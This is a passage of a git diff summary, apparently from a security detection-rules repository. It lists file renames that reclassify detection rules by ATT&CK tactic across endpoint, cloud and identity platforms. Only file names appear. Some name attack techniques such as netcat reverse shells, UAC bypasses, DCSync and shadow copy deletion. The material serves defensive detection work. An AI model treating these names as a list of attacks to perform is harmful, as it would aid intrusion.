credential_access_multiple_user_agent_os_authentication.toml} | 0 ...oml => credential_access_okta_aitm_session_cookie_replay.toml} | 0 ...cess.toml => credential_access_user_impersonation_access.toml} | 0 ...n_suspicious_okta_user_password_reset_or_unlock_attempts.toml} | 0 ...ml => impact_okta_attempt_to_deactivate_okta_application.toml} | 0 ...n.toml => impact_okta_attempt_to_modify_okta_application.toml} | 0 ...oml => initial_access_sign_in_events_via_third_party_idp.toml} | 0 ...ss_successful_application_sso_from_unknown_client_device.toml} | 0 ...ml => lateral_movement_multiple_sessions_for_single_user.toml} | 0 ...oml => persistence_mfa_deactivation_with_no_reactivation.toml} | 0 ...a_attempt_to_modify_or_delete_application_sign_on_policy.toml} | 0 ...redentials_used_to_login_to_okta_account_after_mfa_reset.toml} | 0 ... => command_and_control_perl_outbound_network_connection.toml} | 0 ...pbpaste.toml => credential_access_high_volume_of_pbpaste.toml} | 0 ...ed.toml => defense_evasion_suspicious_tcc_access_granted.toml} | 0 ...picious_sip_check.toml => discovery_suspicious_sip_check.toml} | 0 ...oml => execution_installer_package_spawned_network_event.toml} | 0 ...=> execution_scripting_osascript_exec_followed_by_netcon.toml} | 0 ...=> initial_access_suspicious_mac_ms_office_child_process.toml} | 0 ...nabled.toml => lateral_movement_remote_ssh_login_enabled.toml} | 0 ..._attempt.toml => lateral_movement_vpn_connection_attempt.toml} | 0 ...logon.toml => persistence_account_creation_hide_at_logon.toml} | 0 ...ile.toml => persistence_curl_execution_via_shell_profile.toml} | 0 ... 
persistence_evasion_hidden_launch_agent_deamon_creation.toml} | 0 ...plist_filename.toml => persistence_hidden_plist_filename.toml} | 0 ...oml => privilege_escalation_applescript_with_admin_privs.toml} | 0 ...oml => privilege_escalation_explicit_creds_via_scripting.toml} | 0 ...n.toml => privilege_escalation_local_user_added_to_admin.toml} | 0 ...ilemod.toml => privilege_escalation_root_crontab_filemod.toml} | 0 ...p.toml => privilege_escalation_user_added_to_admin_group.toml} | 0 ...ous_script.toml => execution_ml_windows_anomalous_script.toml} | 0 ..._linux.toml => persistence_ml_rare_process_by_host_linux.toml} | 0 ...y.toml => persistence_ml_windows_anomalous_path_activity.toml} | 0 ...oml => persistence_ml_windows_anomalous_process_creation.toml} | 0 ...mand_and_control_accepted_default_telnet_port_connection.toml} | 0 ...nd_control_rdp_remote_desktop_protocol_from_the_internet.toml} | 0 ..._control_vnc_virtual_network_computing_from_the_internet.toml} | 0 ...ml => initial_access_react_server_components_rce_attempt.toml} | 0 ...initial_access_rpc_remote_procedure_call_to_the_internet.toml} | 0 ...access_smb_windows_file_sharing_activity_to_the_internet.toml} | 0 ..._node.toml => initial_access_unsecure_elasticsearch_node.toml} | 0 ... privilege_escalation_endgame_cred_manipulation_detected.toml} | 0 ...privilege_escalation_endgame_cred_manipulation_prevented.toml} | 0 ...> privilege_escalation_endgame_permission_theft_detected.toml} | 0 ... privilege_escalation_endgame_permission_theft_prevented.toml} | 0 ... 
privilege_escalation_endgame_process_injection_detected.toml} | 0 ...privilege_escalation_endgame_process_injection_prevented.toml} | 0 ..._home_page.toml => command_and_control_outlook_home_page.toml} | 0 ...didns_wildcard.toml => credential_access_adidns_wildcard.toml} | 0 ...parent.toml => credential_access_browsers_unusual_parent.toml} | 0 ..._backdoor.toml => credential_access_dcsync_user_backdoor.toml} | 0 ...node_creation.toml => credential_access_dnsnode_creation.toml} | 0 ...susp_dll.toml => credential_access_lsass_loaded_susp_dll.toml} | 0 ...tial_access_seenabledelegationprivilege_assigned_to_user.toml} | 0 ...credentials.toml => credential_access_shadow_credentials.toml} | 0 ...odified.toml => credential_access_spn_attribute_modified.toml} | 0 ..._access.toml => credential_access_web_config_file_access.toml} | 0 ...fense_evasion_masquerading_suspicious_werfault_childproc.toml} | 0 ...e_payload.toml => defense_evasion_msiexec_remote_payload.toml} | 0 ...monologue.toml => defense_evasion_regmod_remotemonologue.toml} | 0 ...oml => defense_evasion_scheduledjobs_at_protocol_enabled.toml} | 0 ...nds.toml => defense_evasion_suspicious_certutil_commands.toml} | 0 ...defense_evasion_suspicious_process_access_direct_syscall.toml} | 0 ...ss.toml => defense_evasion_suspicious_zoom_child_process.toml} | 0 ...> defense_evasion_unusual_network_connection_via_dllhost.toml} | 0 ... 
defense_evasion_unusual_network_connection_via_rundll32.toml} | 0 ...tion_wsl_bash_exec.toml => defense_evasion_wsl_bash_exec.toml} | 0 ..._com_object_xwizard.toml => execution_com_object_xwizard.toml} | 0 ...l => execution_command_prompt_connecting_to_the_internet.toml} | 0 ...ia_rundll32.toml => execution_command_shell_via_rundll32.toml} | 0 ...igned.toml => execution_delayed_via_ping_lolbas_unsigned.toml} | 0 ...ortcut_files.toml => execution_downloaded_shortcut_files.toml} | 0 ...ownloaded_url_file.toml => execution_downloaded_url_file.toml} | 0 ..._via_wmiprvse.toml => execution_enumeration_via_wmiprvse.toml} | 0 ...path_cmdline.toml => execution_from_unusual_path_cmdline.toml} | 0 ..._html_help_executable_program_connecting_to_the_internet.toml} | 0 ...tool_functions.toml => execution_posh_hacktool_functions.toml} | 0 ...le_executable.toml => execution_posh_portable_executable.toml} | 0 ...ution_register_server_program_connecting_to_the_internet.toml} | 0 ...cmd_via_netcat.toml => execution_revshell_cmd_via_netcat.toml} | 0 ..._remote_webdav.toml => execution_scripting_remote_webdav.toml} | 0 ...l_sxs_dll.toml => execution_shared_modules_local_sxs_dll.toml} | 0 ...uspicious_psexesvc.toml => execution_suspicious_psexesvc.toml} | 0 ...piled_html_file.toml => execution_via_compiled_html_file.toml} | 0 ...shell_conhost.toml => execution_via_hidden_shell_conhost.toml} | 0 ...path.toml => execution_via_mmc_console_file_unusual_path.toml} | 0 ..._susp_args.toml => execution_windows_cmd_shell_susp_args.toml} | 0 ...tcha_cmd_ps.toml => execution_windows_fakecaptcha_cmd_ps.toml} | 0 ...susp_args.toml => execution_windows_powershell_susp_args.toml} | 0 ..._internet.toml => execution_windows_script_from_internet.toml} | 0 ...re_destination.toml => exfiltration_smb_rare_destination.toml} | 0 ...oml => impact_volume_shadow_copy_deletion_via_powershell.toml} | 0 ...wmic.toml => impact_volume_shadow_copy_deletion_via_wmic.toml} | 0 ...l => 
initial_access_evasion_suspicious_htm_file_creation.toml} | 0 ...amcity.toml => initial_access_exploit_jetbrains_teamcity.toml} | 0 ...oit.toml => initial_access_potential_webhelpdesk_exploit.toml} | 0 ...tachment.toml => initial_access_rdp_file_mail_attachment.toml} | 0 ...shell.toml => initial_access_script_executing_powershell.toml} | 0 ...i.toml => initial_access_scripts_process_started_via_wmi.toml} | 0 ...nitial_access_suspicious_execution_from_vscode_extension.toml} | 0 ...itial_access_suspicious_ms_exchange_worker_child_process.toml} | 0 ...oml => initial_access_suspicious_ms_office_child_process.toml} | 0 ...ml => initial_access_suspicious_ms_outlook_child_process.toml} | 0 ...l => initial_access_suspicious_windows_server_update_svc.toml} | 0 ...cve_2025_33053.toml => initial_access_url_cve_2025_33053.toml} | 0 ...initial_access_via_explorer_suspicious_child_parent_args.toml} | 0 ...ver.toml => initial_access_webshell_screenconnect_server.toml} | 0 ..._com.toml => initial_access_xsl_script_execution_via_com.toml} | 0 ...e_creds_pth.toml => lateral_movement_alternate_creds_pth.toml} | 0 ...ecution_cmd_service.toml => lateral_movement_cmd_service.toml} | 0 ...e_evasion_dcom_mmc20.toml => lateral_movement_dcom_mmc20.toml} | 0 ... 
=> lateral_movement_dcom_shellwindow_shellbrowserwindow.toml} | 0 ...ution_incoming_wmi.toml => lateral_movement_incoming_wmi.toml} | 0 ...d_registry.toml => lateral_movement_rdp_enabled_registry.toml} | 0 ...remote_services.toml => lateral_movement_remote_services.toml} | 0 ...log.toml => lateral_movement_remote_task_creation_winlog.toml} | 0 ...sk_target.toml => lateral_movement_scheduled_task_target.toml} | 0 ...en.toml => lateral_movement_unusual_dns_service_children.toml} | 0 ...toml => lateral_movement_unusual_dns_service_file_writes.toml} | 0 ...via_wsus_update.toml => lateral_movement_via_wsus_update.toml} | 0 ...oml => persistence_evasion_hidden_local_account_creation.toml} | 0 ...rsistence_evasion_registry_startup_shell_folder_modified.toml} | 0 ...k_startup.toml => persistence_msi_installer_task_startup.toml} | 0 ...istics.toml => persistence_sdprop_exclusion_dsheuristics.toml} | 0 ..._services_registry.toml => persistence_services_registry.toml} | 0 ...me.toml => persistence_suspicious_scheduled_task_runtime.toml} | 0 ..._services.toml => persistence_system_shells_via_services.toml} | 0 ...p_scheduled_task.toml => persistence_temp_scheduled_task.toml} | 0 ..._command.toml => persistence_via_bits_job_notify_command.toml} | 0 ...luename.toml => persistence_via_hidden_run_key_valuename.toml} | 0 ...ices.toml => persistence_via_wmi_stdregprov_run_services.toml} | 0 ...ml => persistence_via_xp_cmdshell_mssql_stored_procedure.toml} | 0 ...ebshell_detection.toml => persistence_webshell_detection.toml} | 0 ... 
privilege_escalation_account_takeover_mixed_logon_types.toml} | 0 ...use.toml => privilege_escalation_badsuccessor_dmsa_abuse.toml} | 0 ...=> privilege_escalation_create_process_as_different_user.toml} | 0 ...=> privilege_escalation_create_process_with_token_unpriv.toml} | 0 ...aming_ldap.toml => privilege_escalation_credroaming_ldap.toml} | 0 ...gistry.toml => privilege_escalation_disable_uac_registry.toml} | 0 ...ml => privilege_escalation_dmsa_creation_by_unusual_user.toml} | 0 ...ll.toml => privilege_escalation_dns_serverlevelplugindll.toml} | 0 ...oaded.toml => privilege_escalation_expired_driver_loaded.toml} | 0 ...oml => privilege_escalation_gpo_schtask_service_creation.toml} | 0 ...ript.toml => privilege_escalation_group_policy_iniscript.toml} | 0 ...toml => privilege_escalation_group_policy_scheduled_task.toml} | 0 ...toml => privilege_escalation_krbrelayup_service_creation.toml} | 0 ...th_package.toml => privilege_escalation_lsa_auth_package.toml} | 0 ...oken_local.toml => privilege_escalation_make_token_local.toml} | 0 ...toml => privilege_escalation_newcreds_logon_rare_process.toml} | 0 ... privilege_escalation_port_monitor_print_processor_abuse.toml} | 0 ...on.toml => privilege_escalation_posh_token_impersonation.toml} | 0 ...ivilege_escalation_printspooler_suspicious_file_deletion.toml} | 0 ...d.toml => privilege_escalation_reg_service_imagepath_mod.toml} | 0 ... 
privilege_escalation_service_control_spawned_script_int.toml} | 0 ...e_ip.toml => privilege_escalation_takeover_new_source_ip.toml} | 0 ...l => privilege_escalation_tokenmanip_sedebugpriv_enabled.toml} | 0 ...lipup.toml => privilege_escalation_uac_bypass_com_clipup.toml} | 0 ...tal.toml => privilege_escalation_uac_bypass_com_ieinstal.toml} | 0 ...privilege_escalation_uac_bypass_com_interface_icmluautil.toml} | 0 ...ml => privilege_escalation_uac_bypass_diskcleanup_hijack.toml} | 0 ....toml => privilege_escalation_uac_bypass_dll_sideloading.toml} | 0 ...wer.toml => privilege_escalation_uac_bypass_event_viewer.toml} | 0 ...ndir.toml => privilege_escalation_uac_bypass_mock_windir.toml} | 0 ...toml => privilege_escalation_uac_bypass_winfw_mmc_hijack.toml} | 0 ...=> privilege_escalation_unusual_parentchild_relationship.toml} | 0 ...privilege_escalation_unusual_svchost_childproc_childless.toml} | 0 ...token_theft.toml => privilege_escalation_via_token_theft.toml} | 0 ... privilege_escalation_windows_service_via_unusual_client.toml} | 0 ..._activity.toml => command_and_control_bitsadmin_activity.toml} | 0 ...toml => credential_access_entra_id_risk_detection_signal.toml} | 0 ...on.toml => credential_access_mdmp_file_unusual_extension.toml} | 0 ...xtension.toml => defense_evasion_download_susp_extension.toml} | 0 ...msoffice.toml => defense_evasion_injection_from_msoffice.toml} | 0 ...s_child.toml => defense_evasion_outlook_suspicious_child.toml} | 0 ...h_registry.toml => defense_evasion_service_path_registry.toml} | 0 ...vices_exe_path.toml => defense_evasion_services_exe_path.toml} | 0 ...rite_dac_access.toml => defense_evasion_write_dac_access.toml} | 0 ...netraw_capability.toml => discovery_capnetraw_capability.toml} | 0 ...enumeration.toml => discovery_linux_modprobe_enumeration.toml} | 0 ...l_enumeration.toml => discovery_linux_sysctl_enumeration.toml} | 0 ...or_pat.toml => execution_github_new_event_action_for_pat.toml} | 0 ...at.toml => 
execution_github_new_repo_interaction_for_pat.toml} | 0 ...r.toml => execution_github_new_repo_interaction_for_user.toml} | 0 ...ithub_repo_created.toml => execution_github_repo_created.toml} | 0 ...ip.toml => execution_github_repo_interaction_from_new_ip.toml} | 0 ...eation.toml => execution_settingcontent_ms_file_creation.toml} | 0 ...oml => initial_access_anomalous_rsc_flight_data_patterns.toml} | 0 ...pat.toml => initial_access_github_new_ip_address_for_pat.toml} | 0 ....toml => initial_access_okta_admin_console_login_failure.toml} | 0 .../{execution_at.toml => lateral_movement_at.toml} | 0 ...rm_activity.toml => lateral_movement_posh_winrm_activity.toml} | 0 ...ts.toml => lateral_movement_unusual_process_sql_accounts.toml} | 0 ...ecution_wmic_remote.toml => lateral_movement_wmic_remote.toml} | 0 ...pat_for_user.toml => persistence_github_new_pat_for_user.toml} | 0 ...n.toml => persistence_web_server_potential_sql_injection.toml} | 0 ...e.toml => privilege_escalation_sts_getsessiontoken_abuse.toml} | 0 321 files changed, 0 insertions(+), 0 deletions(-) rename rules/cross-platform/{persistence_genai_config_modification.toml => defense_evasion_genai_config_modification.toml} (100%) rename rules/cross-platform/{resource_development_genai_process_compiling_executables.toml => defense_evasion_genai_process_compiling_executables.toml} (100%) rename rules/cross-platform/{collection_genai_process_encoding_prior_to_network_activity.toml => defense_evasion_genai_process_encoding_prior_to_network_activity.toml} (100%) rename rules/cross-platform/{defense_evasion_virtual_machine_fingerprinting_grep.toml => discovery_virtual_machine_fingerprinting_grep.toml} (100%) rename rules/cross-platform/{collection_azure_o365_with_network_alert.toml => initial_access_azure_o365_with_network_alert.toml} (100%) rename rules/cross-platform/{initial_access_web_server_potential_command_injection.toml => persistence_web_server_potential_command_injection.toml} (100%) rename 
rules/cross-platform/{persistence_trap_execution.toml => privilege_escalation_trap_execution.toml} (100%) rename rules/integrations/aws/{defense_evasion_cloudtrail_logging_created.toml => collection_cloudtrail_logging_created.toml} (100%) rename rules/integrations/aws/{persistence_iam_user_addition_to_group.toml => credential_access_iam_user_addition_to_group.toml} (100%) rename rules/integrations/aws/{collection_rds_instance_restored.toml => defense_evasion_rds_instance_restored.toml} (100%) rename rules/integrations/aws/{impact_s3_bucket_lifecycle_expiration_added.toml => defense_evasion_s3_bucket_lifecycle_expiration_added.toml} (100%) rename rules/integrations/aws/{impact_sqs_purge_queue.toml => defense_evasion_sqs_purge_queue.toml} (100%) rename rules/integrations/aws/{persistence_sts_get_federation_token.toml => defense_evasion_sts_get_federation_token.toml} (100%) rename rules/integrations/aws/{defense_evasion_lambda_external_layer_added_to_function.toml => execution_lambda_external_layer_added_to_function.toml} (100%) rename rules/integrations/aws/{collection_dynamodb_scan_by_unusual_user.toml => exfiltration_dynamodb_scan_by_unusual_user.toml} (100%) rename rules/integrations/aws/{discovery_ec2_full_network_packet_capture_detected.toml => exfiltration_ec2_full_network_packet_capture_detected.toml} (100%) rename rules/integrations/aws/{collection_rds_snapshot_export.toml => exfiltration_rds_snapshot_export.toml} (100%) rename rules/integrations/aws/{persistence_s3_bucket_policy_added_for_external_account_access.toml => exfiltration_s3_bucket_policy_added_for_external_account_access.toml} (100%) rename rules/integrations/aws/{defense_evasion_s3_bucket_policy_added_for_public_access.toml => exfiltration_s3_bucket_policy_added_for_public_access.toml} (100%) rename rules/integrations/aws/{defense_evasion_aws_eventbridge_rule_disabled_or_deleted.toml => impact_aws_eventbridge_rule_disabled_or_deleted.toml} (100%) rename 
rules/integrations/aws/{discovery_aws_s3_bucket_enumeration_or_brute_force.toml => impact_aws_s3_bucket_enumeration_or_brute_force.toml} (100%) rename rules/integrations/aws/{defense_evasion_cloudtrail_logging_updated.toml => impact_cloudtrail_logging_updated.toml} (100%) rename rules/integrations/aws/{defense_evasion_cloudwatch_log_group_deletion.toml => impact_cloudwatch_log_group_deletion.toml} (100%) rename rules/integrations/aws/{defense_evasion_cloudwatch_log_stream_deletion.toml => impact_cloudwatch_log_stream_deletion.toml} (100%) rename rules/integrations/aws/{defense_evasion_ec2_disable_ebs_encryption.toml => impact_ec2_disable_ebs_encryption.toml} (100%) rename rules/integrations/aws/{defense_evasion_iam_deactivate_mfa_device.toml => impact_iam_deactivate_mfa_device.toml} (100%) rename rules/integrations/aws/{defense_evasion_rds_instance_cluster_deletion_protection_disabled.toml => impact_rds_instance_cluster_deletion_protection_disabled.toml} (100%) rename rules/integrations/aws/{persistence_ec2_instance_connect_ssh_public_key_uploaded.toml => lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml} (100%) rename rules/integrations/aws/{initial_access_ec2_instance_console_login.toml => lateral_movement_ec2_instance_console_login.toml} (100%) rename rules/integrations/aws/{exfiltration_sns_topic_message_publish_by_rare_user.toml => lateral_movement_sns_topic_message_publish_by_rare_user.toml} (100%) rename rules/integrations/aws/{defense_evasion_ec2_network_acl_creation.toml => persistence_ec2_network_acl_creation.toml} (100%) rename rules/integrations/aws/{defense_evasion_ec2_route_table_modified_or_deleted.toml => persistence_ec2_route_table_modified_or_deleted.toml} (100%) rename rules/integrations/aws/{defense_evasion_ec2_security_group_configuration_change_detection.toml => persistence_ec2_security_group_configuration_change_detection.toml} (100%) rename rules/integrations/aws/{defense_evasion_iam_api_calls_via_user_session_token.toml => 
persistence_iam_api_calls_via_user_session_token.toml} (100%) rename rules/integrations/aws/{privilege_escalation_iam_oidc_provider_created.toml => persistence_iam_oidc_provider_created.toml} (100%) rename rules/integrations/aws/{defense_evasion_lambda_backdoor_invoke_function_for_any_principal.toml => persistence_lambda_backdoor_invoke_function_for_any_principal.toml} (100%) rename rules/integrations/aws/{defense_evasion_rds_instance_made_public.toml => persistence_rds_instance_made_public.toml} (100%) rename rules/integrations/aws/{defense_evasion_route_53_domain_transfer_lock_disabled.toml => persistence_route_53_domain_transfer_lock_disabled.toml} (100%) rename rules/integrations/aws/{resource_development_route_53_domain_transferred_to_another_account.toml => persistence_route_53_domain_transferred_to_another_account.toml} (100%) rename rules/integrations/aws/{defense_evasion_route_53_hosted_zone_associated_with_a_vpc.toml => persistence_route_53_hosted_zone_associated_with_a_vpc.toml} (100%) rename rules/integrations/aws/{defense_evasion_route_table_created.toml => persistence_route_table_created.toml} (100%) rename rules/integrations/aws/{persistence_iam_administratoraccess_policy_attached_to_group.toml => privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml} (100%) rename rules/integrations/aws/{persistence_iam_administratoraccess_policy_attached_to_role.toml => privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml} (100%) rename rules/integrations/aws/{persistence_iam_administratoraccess_policy_attached_to_user.toml => privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml} (100%) rename rules/integrations/aws/{persistence_iam_customer_managed_policy_attached_to_role.toml => privilege_escalation_iam_customer_managed_policy_attached_to_role.toml} (100%) rename rules/integrations/aws/{defense_evasion_iam_saml_provider_updated.toml => privilege_escalation_iam_saml_provider_updated.toml} (100%) rename 
rules/integrations/aws/{persistence_iam_update_assume_role_policy.toml => privilege_escalation_iam_update_assume_role_policy.toml} (100%) rename rules/integrations/aws/{persistence_sts_role_chaining.toml => privilege_escalation_sts_role_chaining.toml} (100%) rename rules/integrations/aws/{impact_sns_topic_created_by_rare_user.toml => resource_development_sns_topic_created_by_rare_user.toml} (100%) rename rules/integrations/azure/{collection_key_vault_excessive_retrieval.toml => credential_access_key_vault_excessive_retrieval.toml} (100%) rename rules/integrations/azure/{persistence_storage_account_key_regenerated.toml => credential_access_storage_account_key_regenerated.toml} (100%) rename rules/integrations/azure/{credential_access_entra_id_teamfiltration_user_agents_detected.toml => discovery_entra_id_teamfiltration_user_agents_detected.toml} (100%) rename rules/integrations/azure/{defense_evasion_storage_blob_container_access_modification.toml => discovery_storage_blob_container_access_modification.toml} (100%) rename rules/integrations/azure/{collection_azure_storage_blob_download_azcopy_sas_token.toml => exfiltration_azure_storage_blob_download_azcopy_sas_token.toml} (100%) rename rules/integrations/azure/{credential_access_azure_arc_cluster_credential_access_unusual_source.toml => initial_access_azure_arc_cluster_credential_access_unusual_source.toml} (100%) rename rules/integrations/azure/{defense_evasion_entra_id_actor_token_user_impersonation_abuse.toml => initial_access_entra_id_actor_token_user_impersonation_abuse.toml} (100%) rename rules/integrations/azure/{defense_evasion_entra_id_device_code_auth_with_broker_client.toml => initial_access_entra_id_device_code_auth_with_broker_client.toml} (100%) rename rules/integrations/azure/{persistence_entra_id_external_guest_user_invite.toml => initial_access_entra_id_external_guest_user_invite.toml} (100%) rename rules/integrations/azure/{defense_evasion_entra_id_federated_login_by_unusual_client.toml => 
initial_access_entra_id_federated_login_by_unusual_client.toml} (100%) rename rules/integrations/azure/{defense_evasion_entra_id_graph_single_session_from_multiple_addresses.toml => initial_access_entra_id_graph_single_session_from_multiple_addresses.toml} (100%) rename rules/integrations/azure/{credential_access_entra_id_illicit_consent_grant_via_registered_application.toml => initial_access_entra_id_illicit_consent_grant_via_registered_application.toml} (100%) rename rules/integrations/azure/{credential_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml => initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml} (100%) rename rules/integrations/azure/{credential_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml => initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml} (100%) rename rules/integrations/azure/{credential_access_entra_id_protection_sign_in_risk_detected.toml => initial_access_entra_id_protection_sign_in_risk_detected.toml} (100%) rename rules/integrations/azure/{defense_evasion_entra_id_rare_app_id_for_principal_auth.toml => initial_access_entra_id_rare_app_id_for_principal_auth.toml} (100%) rename rules/integrations/azure/{credential_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml => initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml} (100%) rename rules/integrations/azure/{defense_evasion_graph_first_occurrence_of_client_request.toml => initial_access_graph_first_occurrence_of_client_request.toml} (100%) rename rules/integrations/azure/{defense_evasion_automation_account_created.toml => persistence_automation_account_created.toml} (100%) rename rules/integrations/azure/{defense_evasion_entra_id_conditional_access_policy_modified.toml => persistence_entra_id_conditional_access_policy_modified.toml} (100%) rename rules/integrations/azure/{defense_evasion_entra_id_mfa_disabled_for_user.toml => 
persistence_entra_id_mfa_disabled_for_user.toml} (100%) rename rules/integrations/azure/{defense_evasion_entra_id_privileged_identity_management_role_modified.toml => persistence_entra_id_privileged_identity_management_role_modified.toml} (100%) rename rules/integrations/azure/{defense_evasion_entra_id_tenant_domain_federation_via_audit_logs.toml => persistence_entra_id_tenant_domain_federation_via_audit_logs.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_user_signed_in_from_unusual_device.toml => persistence_entra_id_user_signed_in_from_unusual_device.toml} (100%) rename rules/integrations/azure/{defense_evasion_graph_eam_addition_or_modification.toml => persistence_graph_eam_addition_or_modification.toml} (100%) rename rules/integrations/azure/{persistence_azure_rbac_administrator_roles_assigned.toml => privilege_escalation_azure_rbac_administrator_roles_assigned.toml} (100%) rename rules/integrations/azure/{persistence_entra_id_elevate_to_user_administrator_access.toml => privilege_escalation_entra_id_elevate_to_user_administrator_access.toml} (100%) rename rules/integrations/azure/{persistence_kubernetes_aks_rolebinding_created.toml => privilege_escalation_kubernetes_aks_rolebinding_created.toml} (100%) rename rules/integrations/ded/{command_and_control_ml_high_bytes_destination_port.toml => exfiltration_ml_high_bytes_destination_port.toml} (100%) rename rules/integrations/gcp/{impact_gcp_pub_sub_subscription_deletion.toml => defense_evasion_gcp_pub_sub_subscription_deletion.toml} (100%) rename rules/integrations/gcp/{impact_gcp_pub_sub_topic_deletion.toml => defense_evasion_gcp_pub_sub_topic_deletion.toml} (100%) rename rules/integrations/gcp/{persistence_gcp_storage_bucket_permissions_modified.toml => defense_evasion_gcp_storage_bucket_permissions_modified.toml} (100%) rename rules/integrations/gcp/{impact_gcp_virtual_private_cloud_network_deleted.toml => defense_evasion_gcp_virtual_private_cloud_network_deleted.toml} (100%) rename 
rules/integrations/gcp/{defense_evasion_gcp_logging_sink_modification.toml => exfiltration_gcp_logging_sink_modification.toml} (100%) rename rules/integrations/gcp/{persistence_gcp_iam_custom_role_creation.toml => initial_access_gcp_iam_custom_role_creation.toml} (100%) rename rules/integrations/gcp/{impact_gcp_iam_service_account_key_deletion.toml => persistence_gcp_iam_service_account_key_deletion.toml} (100%) rename rules/integrations/github/{defense_evasion_github_app_deleted.toml => execution_github_app_deleted.toml} (100%) rename rules/integrations/github/{collection_github_high_number_of_cloned_repos_from_pat.toml => execution_github_high_number_of_cloned_repos_from_pat.toml} (100%) rename rules/integrations/github/{persistence_new_github_app_installed.toml => execution_new_github_app_installed.toml} (100%) rename rules/integrations/github/{collection_high_number_of_cloning_by_user.toml => exfiltration_high_number_of_cloning_by_user.toml} (100%) rename rules/integrations/github/{collection_github_repository_activity_from_unusual_ip.toml => impact_github_repository_activity_from_unusual_ip.toml} (100%) rename rules/integrations/github/{impact_github_actions_bot_first_push_to_repo.toml => initial_access_github_actions_bot_first_push_to_repo.toml} (100%) rename rules/integrations/google_workspace/{exfiltration_google_drive_ownership_transferred_via_google_workspace.toml => collection_google_drive_ownership_transferred_via_google_workspace.toml} (100%) rename rules/integrations/google_workspace/{collection_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml => credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml} (100%) rename rules/integrations/google_workspace/{credential_access_google_workspace_mfa_enforcement_disabled.toml => impact_google_workspace_mfa_enforcement_disabled.toml} (100%) rename rules/integrations/google_workspace/{persistence_external_user_added_to_google_workspace_group.toml => 
initial_access_external_user_added_to_google_workspace_group.toml} (100%) rename rules/integrations/google_workspace/{persistence_google_workspace_suspended_user_renewed.toml => initial_access_google_workspace_suspended_user_renewed.toml} (100%) rename rules/integrations/google_workspace/{execution_object_copied_to_external_drive_with_app_consent.toml => initial_access_object_copied_to_external_drive_with_app_consent.toml} (100%) rename rules/integrations/google_workspace/{defense_evasion_google_workspace_2sv_policy_disabled.toml => persistence_google_workspace_2sv_policy_disabled.toml} (100%) rename rules/integrations/google_workspace/{defense_evasion_google_workspace_password_policy_modified.toml => persistence_google_workspace_password_policy_modified.toml} (100%) rename rules/integrations/google_workspace/{defense_evasion_mfa_disabled_for_google_workspace_organization.toml => persistence_mfa_disabled_for_google_workspace_organization.toml} (100%) rename rules/integrations/kubernetes/{defense_evasion_denied_service_account_request.toml => discovery_denied_service_account_request.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_forbidden_creation_request.toml => execution_forbidden_creation_request.toml} (100%) rename rules/integrations/kubernetes/{discovery_forbidden_request_from_unsual_user_agent.toml => execution_forbidden_request_from_unsual_user_agent.toml} (100%) rename rules/integrations/kubernetes/{discovery_unusual_request_response_by_user_agent.toml => execution_unusual_request_response_by_user_agent.toml} (100%) rename rules/integrations/kubernetes/{initial_access_exposed_service_created_with_type_nodeport.toml => persistence_exposed_service_created_with_type_nodeport.toml} (100%) rename rules/integrations/kubernetes/{execution_container_created_with_excessive_linux_capabilities.toml => privilege_escalation_container_created_with_excessive_linux_capabilities.toml} (100%) rename 
rules/integrations/kubernetes/{execution_pod_created_with_hostipc.toml => privilege_escalation_pod_created_with_hostipc.toml} (100%) rename rules/integrations/kubernetes/{execution_pod_created_with_hostnetwork.toml => privilege_escalation_pod_created_with_hostnetwork.toml} (100%) rename rules/integrations/kubernetes/{execution_pod_created_with_hostpid.toml => privilege_escalation_pod_created_with_hostpid.toml} (100%) rename rules/integrations/kubernetes/{execution_pod_created_with_sensitive_hostpath_volume.toml => privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml} (100%) rename rules/integrations/kubernetes/{execution_privileged_pod_created.toml => privilege_escalation_privileged_pod_created.toml} (100%) rename rules/integrations/kubernetes/{execution_sensitive_rbac_change_followed_by_workload_modification.toml => privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml} (100%) rename rules/integrations/kubernetes/{execution_sensitive_workload_modification_by_user_agent.toml => privilege_escalation_sensitive_workload_modification_by_user_agent.toml} (100%) rename rules/integrations/kubernetes/{persistence_service_account_rbac_write_operation.toml => privilege_escalation_service_account_rbac_write_operation.toml} (100%) rename rules/integrations/kubernetes/{execution_suspicious_assignment_of_controller_service_account.toml => privilege_escalation_suspicious_assignment_of_controller_service_account.toml} (100%) rename rules/integrations/lmd/{execution_ml_high_mean_rdp_process_args.toml => lateral_movement_ml_high_mean_rdp_process_args.toml} (100%) rename rules/integrations/lmd/{exfiltration_ml_spike_in_remote_file_transfers.toml => lateral_movement_ml_spike_in_remote_file_transfers.toml} (100%) rename rules/integrations/o365/{collection_sharepoint_sensitive_term_search.toml => discovery_sharepoint_sensitive_term_search.toml} (100%) rename rules/integrations/o365/{collection_exchange_transport_rule_creation.toml => 
exfiltration_exchange_transport_rule_creation.toml} (100%) rename rules/integrations/o365/{defense_evasion_exchange_transport_rule_modification.toml => exfiltration_exchange_transport_rule_modification.toml} (100%) rename rules/integrations/o365/{persistence_identity_illicit_consent_grant_via_registered_application.toml => initial_access_identity_illicit_consent_grant_via_registered_application.toml} (100%) rename rules/integrations/o365/{credential_access_identity_oauth_phishing_via_first_party_microsoft_application.toml => initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml} (100%) rename rules/integrations/o365/{credential_access_identity_unusual_sso_errors_for_user.toml => initial_access_identity_unusual_sso_errors_for_user.toml} (100%) rename rules/integrations/o365/{defense_evasion_exchange_new_or_modified_federation_domain.toml => privilege_escalation_exchange_new_or_modified_federation_domain.toml} (100%) rename rules/integrations/o365/{persistence_sharepoint_site_collection_admin_added.toml => privilege_escalation_sharepoint_site_collection_admin_added.toml} (100%) rename rules/integrations/okta/{defense_evasion_multiple_user_agent_os_authentication.toml => 